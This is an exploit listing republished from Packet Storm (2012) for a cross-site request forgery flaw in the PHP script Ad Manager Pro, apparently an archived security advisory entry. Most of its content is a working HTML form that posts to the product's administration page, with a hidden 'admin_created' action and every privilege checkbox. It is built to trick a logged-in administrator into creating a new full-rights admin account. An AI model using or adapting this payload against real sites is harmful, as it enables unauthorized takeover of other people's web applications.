Ad Manager Pro Cross Site Request Forgery

🗓️ 11 Mar 2012 00:00:00Reported by Jonturk75Type

packetstorm🔗 packetstormsecurity.com👁 18 Views

Ad Manager Pro CSRF Vulnerability to add admin use

`# Exploit Title: Ad Manager Pro CSRF Vuln (add admin)  
# Author: Jonturk75  
# Vendor of Software Link: http://www.scripts.com/viewscript/php-text-ad-management/20881/  
# Category:: webapps  
# Demo site: http://www.scripts-demo.com/admanagerpro/administration/index.php  
  
  
  
-------------------------------------------------------------------  
<form method="post" action="admanagerpro/administration/index.php"/>  
<td align="left" nowrap="">Username </td>  
<td align="left" colspan="2"><input maxlength="15" value="" name="username" size="15" class="field10"/></td>  
</tr>  
<tr>  
<td align="left" nowrap="">Password </td>  
<td align="left" colspan="2"><input maxlength="15" name="password" size="15" class="field10"/></td>  
</tr><tr>  
<td align="left" nowrap="">Email </td>  
<td align="left" colspan="2"><input value="" maxlength="255" name="email" style="width: 550px;" class="field10"/></td>  
</tr>  
<tr>  
<td align="left" nowrap="">Name </td>  
  
<td align="left" colspan="2"><input value="" maxlength="255" name="name" style="width: 550px;" class="field10"/>  
<input type="hidden" value="admin_created" name="action"/>  
<input type="hidden" value="e8fc7411553641a471251382887a8ce3" name="x"/>  
<input type="hidden" value="" name="n"/><tbody><tr>  
<input type="checkbox" value="advertisers" name="rights[]"/> Create/edit/delete advertisers<br/>  
<input type="checkbox" value="packages" name="rights[]"/> Create/edit/delete advertising packages, prices<br/>  
<input type="checkbox" value="publishers" name="rights[]"/> Create/edit/delete publishers, publishing places, payments<br/>  
<input type="checkbox" value="ads" name="rights[]"/> Create/edit/delete ads<br/>  
<input type="checkbox" value="def_ads" name="rights[]"/> Create/edit/delete default ads<br/>  
<input type="checkbox" value="black_zones" name="rights[]"/> Blacklist, zones and keywords<br/>  
<input type="checkbox" value="backup" name="rights[]"/> Backup/restore database, optimize database<br/>  
<input type="checkbox" value="email_u" name="rights[]"/> Can email and send messages to users<br/>  
<input type="checkbox" value="reset" name="rights[]"/> Reset statistic, run Daily Job<br/>  
<input type="checkbox" value="tmpl_msg" name="rights[]"/> Templates, messages<br/>  
<input type="checkbox" value="admins" name="rights[]"/> Administrators<br/>  
<input type="checkbox" value="config" name="rights[]"/> Configuration, unistallation<br/>  
  
<tr><td align="center" colspan="3"><input type="submit" class="button10" value="Submit" name="submit"/></td></tr>  
</form>   
`

11 Mar 2012 00:00Current

0.6Low risk

Vulners AI Score0.6